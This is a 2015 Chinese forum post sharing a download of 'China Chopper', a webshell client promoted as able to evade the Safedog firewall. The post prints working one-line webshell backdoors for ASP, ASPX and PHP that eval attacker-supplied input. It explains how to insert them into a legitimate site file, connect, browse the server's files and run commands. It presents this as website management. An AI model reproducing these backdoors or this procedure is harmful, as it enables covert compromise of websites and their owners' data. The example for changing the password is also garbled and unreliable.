免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 4673 | 回复: 1
打印 上一主题 下一主题

2015年最新过狗版菜刀-中国菜刀 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2015-01-13 01:15 |只看该作者 |倒序浏览
2015年最新过狗版菜刀-中国菜刀

中国菜刀最新过狗版,过安全狗,升级处理,好用,所以就拿出来共享了


好东西,我就不截图了

2015年最新过狗版菜刀-中国菜刀.rar (259.63 KB, 下载次数: 102)


声明:
一切有关安全、后门类软件均会被报毒,不信任可不下载,如不放心可放入虚拟机、沙盒内运行。





中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态
脚本的网站,都可以用中国菜刀来进行管理!


下面简单介绍一下菜刀的功能:

首先说一下菜刀的功能,菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成drvfan,那么改完之后就是这样的:
<%eval request(“pass”)%>
其他同理。
要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp文件,这个asp文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了。
在菜刀主界面,右击,选择“添加”,
在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的不用填,
填完之后单击“添加”,就可以了。
添加完毕后,你的这个一句话的shell会显示到主界面里,右击它,选择“文件管理”,就可以看到网站上的文件了
在菜刀里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

2015年最新过狗版菜刀-中国菜刀.rar

259.63 KB, 下载次数: 4

2015年最新过狗版菜刀-中国菜刀.rar

259.63 KB, 下载次数: 23

caidaonet 该用户已被删除
2 [报告]
发表于 2015-04-11 18:04 |只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP